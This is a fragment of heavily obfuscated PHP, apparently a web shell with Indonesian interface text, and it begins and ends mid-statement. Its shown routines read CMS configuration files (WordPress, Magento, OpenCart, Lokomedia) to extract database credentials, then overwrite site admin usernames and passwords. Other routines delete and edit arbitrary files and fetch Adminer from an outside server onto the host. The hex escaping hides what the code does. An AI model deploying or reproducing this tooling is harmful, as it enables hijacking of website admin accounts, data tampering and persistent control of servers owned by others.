$file_conf . "\x3c\142\x72\x3e"; echo "\x43\x4d\x53\40\75\76\x20\x57\157\x72\x64\x70\x72\x65\163\x73\x3c\142\x72\76"; echo $url_target; if (!$update or !$conn or !$db) { echo "\x53\x74\x61\x74\165\x73\x20\75\x3e\40\x3c\x66\x6f\156\164\x20\143\157\154\157\162\75\x72\145\x64\x3e" . mysql_error() . "\74\57\146\157\x6e\x74\x3e\74\x62\162\76\74\x62\162\76"; } else { echo "\123\x74\x61\x74\165\x73\40\75\x3e\40\74\x66\x6f\156\164\x20\x63\x6f\154\x6f\162\x3d\154\x69\x6d\x65\76\123\x75\x6b\163\x65\163\x2c\x20\x53\151\154\141\153\x61\x6e\x20\154\157\x67\151\x6e\40\144\x65\x6e\x67\141\156\x20\125\x73\x65\x72\40\x26\x20\x50\141\x73\x73\x77\157\x72\144\40\x79\141\x6e\x67\40\142\x61\162\x75\x2e\x3c\x2f\146\157\x6e\164\x3e\74\x62\162\x3e\x3c\142\162\76"; } mysql_close($conn); } elseif (preg_match("\x2f\115\x61\147\x65\156\x74\x6f\174\x4d\141\147\145\x5f\103\157\x72\145\57", $config)) { $dbhost = ambilkata($config, "\x3c\x68\157\163\164\76\x3c\x21\133\x43\x44\x41\x54\101\x5b", "\135\x5d\x3e\x3c\x2f\x68\x6f\x73\164\x3e"); $dbuser = ambilkata($config, "\x3c\165\163\x65\x72\156\141\155\145\x3e\74\41\133\103\104\101\124\101\133", "\135\x5d\x3e\74\x2f\x75\163\x65\162\x6e\x61\155\x65\x3e"); $dbpass = ambilkata($config, "\x3c\160\141\x73\163\167\x6f\x72\x64\76\74\41\x5b\x43\x44\101\x54\101\x5b", "\x5d\x5d\x3e\x3c\x2f\160\141\163\163\x77\157\x72\144\x3e"); $dbname = ambilkata($config, "\74\x64\142\156\x61\x6d\145\x3e\74\41\x5b\x43\104\101\124\x41\x5b", "\135\135\76\x3c\57\x64\x62\x6e\141\155\145\x3e"); $dbprefix = ambilkata($config, "\x3c\164\141\142\x6c\145\x5f\x70\x72\145\146\151\170\x3e\74\41\x5b\x43\x44\101\x54\x41\x5b", "\135\135\x3e\x3c\57\x74\x61\142\x6c\x65\x5f\x70\x72\x65\146\151\x78\x3e"); $prefix = $dbprefix . "\x61\144\x6d\x69\x6e\137\165\163\145\x72"; $option = $dbprefix . "\x63\x6f\x72\x65\137\x63\157\x6e\146\x69\147\137\x64\141\x74\141"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\x53\x45\114\x45\x43\x54\40\52\40\106\122\117\115\x20{$prefix}\40\x4f\122\x44\x45\x52\x20\102\131\x20\165\163\145\162\137\151\144\40\101\123\x43"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("\x53\x45\x4c\105\x43\124\40\52\40\x46\x52\117\x4d\40{$option}\40\x57\x48\105\x52\105\x20\x70\x61\x74\x68\x3d\x27\x77\x65\x62\x2f\x73\145\143\165\x72\145\57\x62\x61\x73\145\x5f\165\162\154\x27"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if ($target == '') { $url_target = "\x4c\157\147\151\156\x20\75\76\x20\x3c\146\x6f\x6e\164\x20\143\157\x6c\x6f\162\x3d\162\145\144\76\x45\x72\x72\157\x72\54\40\x54\151\x64\x61\153\40\x64\141\x70\141\164\40\155\x65\156\x67\x61\x6d\x62\x69\154\x20\x6e\141\155\x61\40\x64\x6f\155\141\151\156\x6e\171\x61\74\57\146\157\x6e\x74\76\74\x62\162\76"; } else { $url_target = "\x4c\157\x67\151\x6e\x20\x3d\76\x20\x3c\141\x20\x68\162\x65\146\75\47{$target}\x2f\x61\x64\155\x69\x6e\x2f\x27\40\164\x61\162\x67\145\x74\75\47\x5f\x62\x6c\141\156\153\x27\x3e\x3c\165\76{$target}\57\141\144\x6d\x69\156\57\x3c\57\165\76\74\57\141\x3e\x3c\142\162\x3e"; } $update = mysql_query("\125\120\104\x41\x54\105\40{$prefix}\40\123\105\124\40\165\163\x65\x72\x6e\x61\155\x65\x3d\x27{$user_baru}\47\x2c\160\x61\163\163\167\x6f\x72\x64\x3d\x27{$pass_baru}\x27\40\127\110\x45\122\x45\40\x75\x73\145\162\137\151\x64\x3d\x27{$id}\x27"); echo "\103\157\x6e\146\x69\147\40\x3d\x3e\x20" . $file_conf . "\x3c\x62\x72\x3e"; echo "\103\x4d\x53\x20\x3d\x3e\40\x4d\141\x67\145\x6e\164\x6f\74\x62\x72\x3e"; echo $url_target; if (!$update or !$conn or !$db) { echo "\123\164\141\164\165\163\40\x3d\76\40\x3c\x66\157\x6e\164\x20\143\x6f\x6c\x6f\x72\x3d\x72\145\x64\76" . mysql_error() . "\x3c\x2f\x66\157\x6e\x74\76\x3c\142\162\76\x3c\142\162\x3e"; } else { echo "\123\164\141\x74\x75\x73\x20\x3d\x3e\x20\x3c\146\157\156\x74\40\143\x6f\x6c\x6f\x72\x3d\x6c\151\x6d\145\x3e\123\x75\x6b\163\145\163\x2c\40\x53\151\154\141\x6b\x61\x6e\x20\x6c\x6f\147\x69\156\x20\x64\x65\156\147\141\156\x20\x55\x73\x65\x72\40\46\x20\120\x61\x73\163\x77\x6f\x72\144\x20\x79\x61\x6e\x67\40\x62\x61\x72\x75\x2e\x3c\x2f\146\157\x6e\x74\x3e\74\x62\162\76\74\x62\162\x3e"; } mysql_close($conn); } elseif (preg_match("\x2f\x48\x54\124\120\137\123\x45\x52\x56\105\122\174\110\124\124\120\x5f\x43\101\x54\101\114\117\107\174\104\111\x52\137\103\x4f\x4e\106\x49\107\174\104\111\x52\137\x53\131\123\124\x45\x4d\x2f", $config)) { $dbhost = ambilkata($config, "\x27\104\102\137\110\117\x53\x54\116\101\115\x45\47\x2c\40\47", "\47"); $dbuser = ambilkata($config, "\47\x44\102\137\x55\123\105\x52\116\x41\x4d\105\47\x2c\40\x27", "\x27"); $dbpass = ambilkata($config, "\47\104\x42\x5f\x50\x41\x53\x53\127\117\122\x44\47\x2c\40\x27", "\x27"); $dbname = ambilkata($config, "\47\x44\102\137\104\x41\124\101\102\x41\x53\105\47\54\40\x27", "\47"); $dbprefix = ambilkata($config, "\x27\x44\102\137\x50\x52\105\106\x49\x58\x27\x2c\x20\x27", "\x27"); $prefix = $dbprefix . "\x75\x73\145\162"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\123\x45\x4c\x45\103\x54\40\x2a\40\106\x52\117\115\40{$prefix}\x20\x4f\x52\104\x45\122\40\102\131\40\x75\x73\x65\162\137\151\144\x20\101\123\103"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config, "\110\124\x54\120\137\x53\x45\122\x56\x45\122\47\x2c\40\47", "\47"); if ($target == '') { $url_target = "\x4c\x6f\147\x69\x6e\40\x3d\x3e\40\x3c\146\x6f\156\x74\x20\x63\157\154\x6f\162\75\162\145\144\76\105\162\162\x6f\162\x2c\40\x54\x69\144\141\x6b\40\x64\x61\x70\141\164\x20\x6d\x65\156\147\141\x6d\142\x69\x6c\40\156\141\x6d\x61\x20\x64\x6f\155\141\x69\x6e\x6e\x79\x61\x3c\57\x66\x6f\x6e\x74\76\x3c\x62\162\76"; } else { $url_target = "\x4c\x6f\x67\151\156\x20\x3d\76\40\74\x61\x20\150\162\x65\x66\75\x27{$target}\47\x20\164\x61\x72\x67\x65\164\x3d\x27\137\x62\154\141\x6e\x6b\47\x3e\x3c\165\x3e{$target}\x3c\57\165\x3e\x3c\57\141\x3e\x3c\142\162\76"; } $update = mysql_query("\125\x50\x44\x41\x54\105\x20{$prefix}\x20\123\x45\x54\x20\x75\163\x65\162\x6e\141\155\145\75\x27{$user_baru}\47\x2c\160\x61\x73\163\167\x6f\162\x64\75\x27{$pass_baru}\x27\x20\x57\x48\105\x52\105\40\x75\163\x65\162\x5f\151\144\x3d\x27{$id}\x27"); echo "\103\157\x6e\146\x69\147\x20\x3d\76\40" . $file_conf . "\x3c\x62\162\76"; echo "\x43\115\x53\x20\x3d\x3e\40\117\x70\145\x6e\103\141\x72\x74\74\x62\x72\x3e"; echo $url_target; if (!$update or !$conn or !$db) { echo "\x53\164\141\x74\x75\x73\x20\75\76\40\74\146\x6f\x6e\x74\x20\143\157\154\x6f\x72\75\x72\x65\x64\76" . mysql_error() . "\74\x2f\146\x6f\156\164\76\x3c\x62\162\76\74\x62\x72\x3e"; } else { echo "\x53\x74\x61\x74\x75\163\x20\75\76\x20\x3c\x66\x6f\156\x74\40\x63\157\154\x6f\162\x3d\x6c\x69\155\145\76\x53\x75\153\163\145\x73\x2c\x20\x53\151\x6c\x61\153\141\156\x20\154\x6f\x67\151\x6e\x20\x64\x65\156\147\141\x6e\x20\125\x73\145\162\40\x26\40\120\x61\x73\x73\x77\x6f\x72\x64\40\171\141\x6e\147\x20\142\x61\162\165\56\74\57\146\x6f\x6e\164\x3e\74\x62\162\x3e\x3c\x62\162\x3e"; } mysql_close($conn); } elseif (preg_match("\57\x70\141\x6e\147\147\151\154\40\146\x75\x6e\x67\163\x69\x20\x76\141\x6c\151\144\x61\163\151\40\170\163\x73\40\144\141\x6e\40\151\156\152\145\143\164\151\157\156\57", $config)) { $dbhost = ambilkata($config, "\x73\x65\162\x76\x65\162\40\75\x20\x22", "\42"); $dbuser = ambilkata($config, "\x75\x73\145\x72\156\x61\155\x65\x20\75\x20\x22", "\x22"); $dbpass = ambilkata($config, "\160\141\x73\163\x77\157\162\144\x20\x3d\x20\42", "\x22"); $dbname = ambilkata($config, "\144\x61\164\x61\142\x61\163\145\x20\x3d\x20\42", "\x22"); $prefix = "\165\163\145\x72\163"; $option = "\x69\144\x65\x6e\164\x69\x74\141\x73"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\123\x45\x4c\x45\103\124\40\52\40\106\x52\117\115\x20{$option}\x20\x4f\122\104\x45\122\x20\102\131\40\151\x64\137\x69\x64\x65\x6e\x74\151\x74\141\x73\x20\101\123\103"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if ($target == '') { $target2 = $result[url]; $url_target = "\114\x6f\147\x69\156\40\75\76\40\x3c\x66\157\156\164\x20\x63\157\x6c\157\162\x3d\x72\145\x64\x3e\105\x72\162\x6f\x72\54\40\x54\151\x64\x61\x6b\40\144\141\x70\141\x74\40\155\145\x6e\x67\141\x6d\x62\x69\x6c\40\156\x61\155\x61\40\x64\x6f\x6d\141\x69\x6e\x6e\x79\141\x3c\57\x66\157\x6e\x74\x3e\x3c\142\x72\76"; if ($target2 == '') { $url_target2 = "\x4c\157\x67\151\156\x20\75\x3e\x20\74\x66\x6f\156\164\x20\x63\157\x6c\x6f\x72\75\x72\x65\x64\76\105\x72\162\157\x72\54\40\124\151\144\x61\153\x20\144\x61\x70\x61\x74\x20\x6d\x65\x6e\x67\x61\x6d\x62\151\154\x20\156\141\x6d\x61\40\x64\157\x6d\x61\151\x6e\x6e\x79\141\74\x2f\x66\x6f\156\164\x3e\74\x62\x72\76"; } else { $cek_login3 = file_get_contents("{$target2}\57\x61\144\x6d\151\156\x77\145\142\57"); $cek_login4 = file_get_contents("{$target2}\x2f\x6c\157\x6b\157\x6d\x65\144\151\141\x2f\141\144\x6d\151\x6e\167\x65\x62\x2f"); if (preg_match("\x2f\103\x4d\x53\40\x4c\157\x6b\157\x6d\145\144\x69\141\174\x41\144\155\151\156\151\163\x74\162\141\x74\157\162\x2f", $cek_login3)) { $url_target2 = "\x4c\x6f\x67\151\x6e\x20\x3d\76\x20\x3c\x61\40\150\x72\x65\x66\75\47{$target2}\57\141\144\155\x69\x6e\167\145\142\x27\x20\x74\x61\x72\x67\x65\164\x3d\x27\x5f\x62\154\141\x6e\153\x27\76\x3c\x75\x3e{$target2}\57\x61\x64\x6d\x69\156\x77\145\142\74\57\165\x3e\74\x2f\x61\x3e\x3c\142\162\76"; } elseif (preg_match("\57\103\x4d\123\40\114\157\x6b\x6f\x6d\x65\144\151\141\x7c\114\x6f\x6b\157\x6d\x65\x64\151\141\57", $cek_login4)) { $url_target2 = "\x4c\157\x67\x69\x6e\40\x3d\76\40\x3c\141\x20\x68\x72\145\146\75\47{$target2}\57\x6c\x6f\x6b\x6f\155\145\144\x69\141\57\141\x64\155\x69\x6e\167\145\x62\47\40\x74\141\162\147\145\x74\x3d\47\137\x62\154\x61\x6e\x6b\47\76\74\165\76{$target2}\x2f\x6c\x6f\x6b\x6f\x6d\145\144\151\141\x2f\141\x64\155\151\156\x77\145\142\74\57\165\x3e\74\x2f\141\x3e\x3c\142\x72\x3e"; } else { $url_target2 = "\x4c\157\x67\151\156\40\75\x3e\40\74\141\x20\150\162\x65\146\75\x27{$target2}\47\x20\x74\x61\162\x67\145\164\x3d\x27\137\x62\154\141\156\153\47\76\74\165\x3e{$target2}\x3c\57\165\76\x3c\x2f\141\76\40\x5b\40\74\146\157\x6e\x74\x20\x63\x6f\x6c\157\x72\75\162\x65\144\76\x67\141\x74\x61\x75\x20\x61\144\x6d\x69\156\x20\154\x6f\147\151\156\x20\156\x79\x61\x20\x64\151\155\x61\156\141\x20\x3a\x70\74\x2f\146\x6f\156\x74\x3e\40\x5d\74\142\162\x3e"; } } } else { $cek_login = file_get_contents("{$target}\x2f\x61\144\x6d\x69\x6e\x77\x65\x62\x2f"); $cek_login2 = file_get_contents("{$target}\57\x6c\157\x6b\157\155\x65\144\x69\x61\x2f\x61\144\155\x69\x6e\x77\x65\142\57"); if (preg_match("\57\103\115\123\40\114\157\153\x6f\155\145\x64\151\141\x7c\101\144\x6d\151\156\151\x73\164\162\141\164\157\162\x2f", $cek_login)) { $url_target = "\114\x6f\147\x69\156\40\x3d\76\40\x3c\x61\x20\150\x72\145\146\75\x27{$target}\x2f\141\144\155\151\156\x77\145\142\47\40\x74\141\162\x67\x65\164\75\x27\137\x62\154\x61\156\x6b\x27\x3e\74\x75\76{$target}\x2f\141\144\x6d\151\156\x77\x65\142\x3c\x2f\165\76\74\x2f\x61\x3e\x3c\142\x72\76"; } elseif (preg_match("\x2f\103\115\123\x20\x4c\x6f\x6b\157\x6d\145\144\151\x61\x7c\x4c\x6f\x6b\x6f\x6d\x65\x64\x69\141\57", $cek_login2)) { $url_target = "\114\157\x67\151\x6e\x20\x3d\x3e\40\x3c\141\x20\150\162\x65\146\75\x27{$target}\57\x6c\x6f\153\157\155\145\144\x69\x61\x2f\141\x64\155\151\156\167\145\x62\47\40\164\141\x72\147\x65\x74\x3d\x27\137\x62\x6c\x61\156\153\x27\76\74\x75\x3e{$target}\x2f\154\x6f\153\157\155\145\144\151\141\57\x61\x64\155\x69\x6e\x77\145\142\74\x2f\165\76\74\57\x61\76\x3c\x62\x72\76"; } else { $url_target = "\114\157\x67\x69\156\40\x3d\76\x20\x3c\141\x20\150\162\145\x66\x3d\47{$target}\x27\x20\x74\x61\x72\x67\145\164\75\x27\x5f\142\x6c\x61\x6e\x6b\47\x3e\74\x75\x3e{$target}\x3c\57\x75\x3e\74\57\141\x3e\x20\133\x20\74\x66\157\156\164\40\143\x6f\x6c\157\x72\75\162\x65\x64\x3e\147\141\164\141\x75\40\141\144\155\151\x6e\40\154\157\147\x69\156\x20\156\171\x61\x20\x64\x69\x6d\x61\x6e\141\x20\72\x70\74\57\146\157\x6e\x74\x3e\x20\x5d\74\x62\162\76"; } } $update = mysql_query("\x55\120\104\101\x54\105\40{$prefix}\x20\123\x45\124\x20\x75\163\x65\x72\156\x61\155\x65\75\x27{$user_baru}\x27\54\x70\141\x73\163\167\x6f\x72\x64\x3d\47{$pass_baru}\x27\x20\x57\x48\x45\122\x45\x20\154\145\x76\145\154\x3d\47\x61\x64\x6d\151\156\x27"); echo "\x43\x6f\156\146\x69\147\40\x3d\76\40" . $file_conf . "\74\x62\162\x3e"; echo "\x43\115\x53\x20\75\x3e\x20\114\157\x6b\x6f\x6d\145\144\x69\x61\x3c\142\x72\76"; if (preg_match("\57\x45\x72\x72\157\x72\54\x20\x54\151\x64\x61\x6b\x20\x64\x61\160\141\164\x20\x6d\x65\156\147\141\155\142\x69\154\40\x6e\141\155\x61\40\x64\157\x6d\141\x69\x6e\x6e\x79\141\x2f", $url_target)) { echo $url_target2; } else { echo $url_target; } if (!$update or !$conn or !$db) { echo "\x53\164\x61\x74\x75\163\x20\75\76\x20\x3c\x66\157\156\164\x20\143\x6f\154\157\x72\75\162\x65\144\x3e" . mysql_error() . "\x3c\57\146\157\156\x74\x3e\74\142\162\76\x3c\x62\162\76"; } else { echo "\123\164\141\x74\165\163\x20\75\x3e\40\74\146\157\156\164\40\143\x6f\x6c\157\162\x3d\x6c\151\155\145\76\x53\165\x6b\x73\145\163\x2c\40\123\151\154\141\x6b\141\156\40\154\x6f\x67\x69\156\x20\x64\x65\156\x67\x61\x6e\40\x55\x73\145\x72\40\x26\40\x50\141\163\163\167\x6f\x72\x64\40\171\141\156\x67\x20\x62\141\x72\165\x2e\x3c\57\146\157\156\x74\x3e\x3c\x62\x72\x3e\74\142\x72\x3e"; } mysql_close($conn); } } } } else { echo "\xa\x9\x9\x9\74\150\x34\40\x63\154\141\163\163\x3d\x27\x74\145\170\164\x2d\x63\x65\x6e\164\x65\x72\40\155\142\55\65\x27\76\101\165\x74\x6f\40\105\x64\151\x74\x20\125\163\145\x72\74\57\x68\x34\x3e\xa\x9\x9\x9\x3c\146\157\162\155\x20\155\x65\x74\x68\x6f\144\75\47\x70\x6f\x73\x74\x27\76\xa\11\x9\11\11\x3c\x68\x35\x3e\114\157\153\141\x73\151\x20\x44\x69\x72\x20\x43\x6f\156\146\151\x67\74\x2f\150\65\76\12\x9\x9\x9\11\x3c\151\156\160\165\x74\40\164\x79\x70\x65\x3d\x27\x74\145\x78\x74\47\x20\x63\154\x61\x73\x73\75\47\x66\x6f\162\155\x2d\143\157\x6e\x74\x72\157\154\40\155\x62\55\x33\47\40\x6e\141\155\145\75\x27\143\x6f\156\x66\x69\x67\x5f\144\x69\x72\47\40\166\141\x6c\165\145\x3d\47{$dir}\x27\x3e\xa\x9\x9\11\11\74\x68\65\76\123\145\x74\x20\125\163\145\162\x20\46\x20\120\141\x73\163\x20\x3a\x3c\57\x68\x35\x3e\12\x9\11\x9\x9\74\151\156\160\x75\164\x20\164\x79\160\145\x3d\47\164\145\x78\x74\x27\40\156\141\155\145\75\47\x75\x73\145\x72\x5f\x62\141\162\165\47\40\x76\141\154\x75\x65\75\x27\151\156\144\x6f\x73\x65\143\47\40\x63\x6c\x61\163\x73\75\47\146\157\162\155\55\143\x6f\x6e\x74\x72\x6f\154\x20\x6d\x62\55\x33\x27\x20\x70\x6c\141\143\145\150\157\154\144\145\162\x3d\47\x55\x73\x65\162\156\141\155\x65\40\102\x61\162\165\47\76\12\x9\x9\x9\11\x3c\151\x6e\160\165\x74\x20\164\171\160\145\75\47\164\x65\170\164\x27\40\156\141\155\145\x3d\x27\x70\x61\163\x73\x5f\x62\x61\162\x75\x27\x20\166\x61\x6c\165\145\75\47\x69\156\x64\157\x73\145\143\47\40\143\x6c\141\163\163\x3d\47\x66\157\x72\155\x2d\143\x6f\156\164\x72\x6f\154\x20\x6d\142\x2d\64\x27\x20\x70\x6c\x61\x63\x65\x68\157\154\144\145\x72\75\x27\x50\x61\163\163\167\157\162\144\40\102\141\162\x75\47\x3e\12\11\x9\11\x9\x3c\x69\156\x70\165\164\x20\164\x79\x70\x65\75\x27\163\165\142\x6d\151\x74\47\x20\x6e\141\155\145\x3d\x27\x68\141\x6a\141\x72\47\x20\x76\141\x6c\165\x65\75\x27\x45\x64\151\164\40\x55\163\145\x72\47\x20\143\x6c\141\163\163\75\47\x62\164\156\x20\x62\164\x6e\55\144\141\x6e\147\x65\x72\40\142\164\x6e\55\142\x6c\157\x63\x6b\x27\x3e\12\11\11\x9\x3c\57\x66\157\x72\x6d\76\xa\x9\x9\x9\74\160\40\x63\154\141\163\x73\x3d\x27\x74\145\x78\164\x2d\155\165\164\145\x64\x20\x6d\142\x2d\x34\47\x3e\116\102\x3a\40\124\x6f\157\x6c\163\x20\x69\156\x69\40\x77\x6f\x72\153\40\x6a\151\x6b\141\40\144\x69\152\141\x6c\141\x6e\153\141\x6e\x20\144\151\x20\144\x61\x6c\x61\x6d\40\146\157\154\144\x65\162\x20\74\x75\x3e\143\x6f\x6e\x66\x69\147\x3c\57\165\76\40\x28\40\x65\170\x3a\x20\57\x68\157\x6d\145\57\165\163\x65\x72\x2f\x70\x75\142\154\x69\143\137\x68\x74\155\x6c\x2f\156\141\155\x61\137\x66\157\154\x64\145\162\x5f\143\x6f\156\x66\151\147\x20\51\x3c\x2f\160\76"; } die; } goto E44u8; XV3ue: if ($_GET["\x61\153\163\151"] == "\150\141\x70\165\163\146") { $nama = basename($file); echo "\x5b\x20\x3c\x61\x20\150\x72\145\x66\x3d\42\x3f\x64\x69\162\x3d" . $dir . "\x26\141\153\x73\151\75\x76\x69\x65\x77\x26\x66\x69\x6c\145\x3d" . $file . "\x22\x3e\x4c\151\150\x61\164\x3c\x2f\141\x3e\40\135\x20\40\133\x20\74\141\x20\150\x72\145\x66\75\42\x3f\x64\x69\x72\x3d" . $dir . "\46\x61\153\163\151\75\x65\x64\x69\x74\x26\x66\151\154\145\75" . $file . "\42\76\x45\x64\151\164\74\57\141\76\x20\135\40\40\x5b\40\74\141\40\150\x72\x65\146\75\42\77\144\x69\x72\75" . $dir . "\46\141\153\x73\151\75\x72\x65\156\141\x6d\145\x26\x66\x69\154\145\x3d" . $file . "\42\76\122\145\156\141\x6d\145\x3c\x2f\x61\x3e\x20\135\x20\40\x5b\x20\x3c\x61\40\143\x6c\x61\163\163\75\42\x61\143\x74\x69\166\145\42\40\x68\x72\145\x66\x3d\42\x3f\144\151\162\75" . $dir . "\x26\141\x6b\163\151\75\150\x61\160\x75\x73\x66\x26\x66\151\154\145\x3d" . $file . "\x22\76\x44\145\x6c\x65\164\x65\x3c\57\x61\76\40\135"; echo "\xa\11\11\x9\x3c\144\151\x76\40\143\154\x61\x73\x73\x3d\x27\143\x61\162\144\x20\x63\x61\x72\144\55\x62\157\x64\171\x20\x74\x65\170\164\55\x63\145\x6e\164\145\162\x27\76\xa\11\11\x9\x9\x9\x3c\146\157\156\x74\x20\x63\x6f\154\157\162\x3d\47\x62\154\x61\143\x6b\x27\x3e\131\x61\153\x69\x6e\x20\x4d\x65\x6e\x67\x68\141\x70\165\163\40\72\40{$nama}\74\57\x66\157\156\164\x3e\xa\x9\11\x9\11\x3c\142\x72\x2f\76\xa\x9\x9\x9\x9\x3c\146\157\162\x6d\40\x6d\x65\164\150\157\x64\x3d\x27\x50\117\123\124\x27\76\12\x9\11\11\11\x9\x3c\x61\40\143\154\x61\163\163\75\x27\x62\164\x6e\40\x62\164\x6e\55\144\141\x6e\x67\145\162\x20\142\164\156\55\142\x6c\157\143\153\47\40\x68\x72\145\x66\75\47\x3f\144\151\x72\75{$dir}\x27\x3e\124\151\x64\x61\x6b\x3c\x2f\x61\76\12\11\x9\11\11\x9\x3c\x69\x6e\160\165\164\40\164\171\x70\145\x3d\47\x73\x75\x62\x6d\x69\x74\47\40\156\141\155\x65\x3d\47\171\x61\x27\40\143\154\141\x73\x73\75\47\x62\x74\156\40\142\x74\x6e\55\163\165\x63\x63\145\163\163\x20\142\x74\156\55\163\x75\x63\x63\145\x73\163\x20\x62\164\x6e\x2d\x62\154\x6f\143\x6b\47\x20\166\141\x6c\165\145\x3d\x27\x59\x61\47\76\12\x9\11\x9\11\x3c\x2f\146\157\x72\155\x3e\xa\x9\11\x9\74\57\144\x69\x76\76"; if ($_POST["\171\x61"]) { $hapus = unlink($file); if ($hapus) { echo "\74\163\143\162\151\x70\x74\76\x77\151\156\144\x6f\167\56\154\157\x63\141\x74\151\x6f\x6e\x3d\x22\x3f\144\151\162\75" . $dir . "\42\73\x20\141\x6c\x65\162\x74\x28\x22\x42\145\162\150\x61\x73\x69\x6c\x20\115\145\156\x67\150\x61\x70\x75\163\x20\x46\x69\154\145\x22\x29\73\74\57\x73\x63\162\151\160\164\x3e"; } else { echo "\x3c\163\143\162\151\x70\x74\76\141\x6c\145\x72\x74\50\42\107\x61\x67\x61\154\x20\115\x65\156\x67\x68\141\160\x75\163\x20\x46\x69\154\145\41\42\51\x3b\74\57\163\x63\162\x69\160\164\76"; } } } goto O8Mx0; V40Ns: if ($_GET["\x61\x6b\163\151"] == "\x61\144\155\151\156\x65\x72") { $full = str_replace($_SERVER["\x44\117\103\125\115\105\116\x54\x5f\x52\117\x4f\124"], '', $path); function adminer($url, $isi) { $fp = fopen($isi, "\167"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists("\x61\144\155\151\x6e\145\x72\x2e\x70\x68\x70")) { echo "\x3c\x61\40\x68\x72\145\146\x3d\47{$full}\57\141\x64\x6d\x69\x6e\145\x72\56\160\150\x70\47\40\x74\x61\x72\147\145\164\x3d\47\137\142\x6c\141\x6e\153\47\x20\143\x6c\141\x73\x73\75\47\x74\145\x78\164\x2d\143\145\x6e\164\145\162\40\x62\x74\156\x20\x62\164\156\x2d\x73\165\143\x63\145\163\163\x20\142\x74\x6e\55\x62\x6c\157\x63\x6b\x20\155\x62\x2d\63\x27\76\114\x6f\147\151\156\40\101\x64\x6d\x69\x6e\145\162\x3c\57\141\76"; } else { if (adminer("\150\x74\x74\160\163\72\57\57\x77\167\x77\56\x61\144\155\x69\x6e\x65\x72\x2e\x6f\162\147\57\163\164\141\164\151\x63\x2f\144\x6f\x77\x6e\x6c\x6f\x61\x64\57\x34\56\x32\x2e\x34\57\x61\144\155\x69\x6e\145\x72\55\64\56\62\x2e\64\x2e\160\150\160", "\x61\x64\x6d\x69\x6e\x65\x72\56\x70\150\x70")) { echo "\x3c\141\40\150\x72\145\146\75\x27{$full}\x2f\x61\x64\x6d\x69\156\145\162\x2e\x70\150\160\x27\40\164\141\162\x67\145\164\75\47\x5f\x62\x6c\141\x6e\x6b\47\40\143\x6c\x61\x73\163\x3d\x27\164\x65\x78\x74\55\x63\x65\156\x74\145\x72\x20\142\x74\x6e\x20\142\x74\x6e\55\163\165\x63\143\145\163\x73\40\142\x74\156\x2d\x62\154\157\x63\153\x20\x6d\142\x2d\63\x27\x3e\x4c\157\x67\151\x6e\x20\x41\144\155\x69\x6e\145\x72\74\57\141\76"; } else { echo "\x3c\160\40\143\154\x61\163\163\x3d\x27\164\145\170\x74\55\143\x65\x6e\x74\x65\162\x20\164\145\170\164\x2d\x64\x61\156\x67\x65\x72\47\x3e\x47\x61\147\x61\x6c\40\x4d\x65\155\x62\165\x61\164\x20\x41\x64\155\x69\156\145\162\x3c\x2f\160\76"; } } die; } goto O0b8k; tUIs1: if ($_GET["\x61\x6b\163\151"] == "\145\144\151\164") { $nama = basename($file); echo "\x5b\x20\74\x61\x20\150\162\145\146\x3d\x22\77\x64\x69\162\75" . $dir . "\x26\x61\153\163\151\x3d\x76\x69\x65\167\46\146\151\154\145\x3d" . $file . "\42\76\x4c\151\x68\x61\164\x3c\57\x61\76\40\135\x20\40\133\x20\x3c\x61\40\x63\x6c\x61\x73\x73\75\x22\141\143\164\x69\x76\x65\42\40\150\x72\x65\146\x3d\42\77\x64\x69\162\x3d" . $dir . "\x26\141\x6b\163\151\x3d\145\144\x69\x74\46\146\151\x6c\145\75" . $file . "\42\x3e\x45\x64\x69\164\x3c\57\x61\x3e\40\x5d\40\40\x5b\x20\74\141\40\150\162\145\146\75\42\x3f\x64\x69\162\75" . $dir . "\46\x61\153\163\x69\x3d\162\145\156\141\155\x65\46\x66\151\154\145\75" . $file . "\42\76\122\145\156\x61\x6d\x65\x3c\x2f\141\76\40\x5d\40\40\x5b\x20\74\141\40\x68\x72\145\x66\x3d\42\77\144\151\x72\x3d" . $dir . "\46\141\153\163\x69\75\150\x61\x70\x75\x73\146\46\x66\151\x6c\x65\75" . $file . "\42\76\104\145\154\145\164\145\x3c\x2f\141\76\40\x5d"; echo "\74\x66\157\162\155\40\155\x65\164\x68\x6f\x64\75\x27\120\117\x53\124\47\x3e\12\11\11\x9\11\x3c\150\65\76\74\151\x20\x63\154\141\163\163\75\47\146\141\40\146\141\x2d\146\151\x6c\x65\x27\76\x3c\x2f\151\x3e\x20\105\144\x69\x74\x20\106\151\x6c\145\40\x3a\x20{$nama}\x3c\57\150\65\x3e\12\x9\x9\11\x9\74\x74\x65\170\x74\x61\162\x65\x61\x20\x72\157\167\x73\75\47\x39\x27\x20\143\154\x61\163\x73\x3d\47\x66\x6f\x72\x6d\x2d\x63\157\156\164\162\x6f\154\47\x20\156\x61\155\145\x3d\x27\x69\x73\x69\x27\76" . htmlspecialchars(file_get_contents($file)) . "\74\x2f\164\x65\170\164\x61\162\x65\x61\76\74\142\x72\57\76\xa\11\x9\11\11\x9\74\142\165\164\x74\157\x6e\40\x74\x79\160\x65\x3d\x27\x73\165\155\142\151\x74\47\x20\143\x6c\141\163\x73\x3d\x27\142\164\x6e\x20\142\164\x6e\55\151\156\146\157\x20\x62\x74\156\x2d\142\x6c\x6f\x63\x6b\x27\40\x6e\141\x6d\145\75\47\145\x64\x69\164\x5f\146\x69\154\145\47\x3e\x55\160\x64\x61\164\145\74\x2f\142\x75\164\x74\157\x6e\76\xa\11\x9\11\74\57\x66\x6f\162\x6d\x3e"; if (isset($_POST["\145\144\151\164\137\146\151\x6c\145"])) { $updt = fopen("{$file}", "\167"); $hasil = 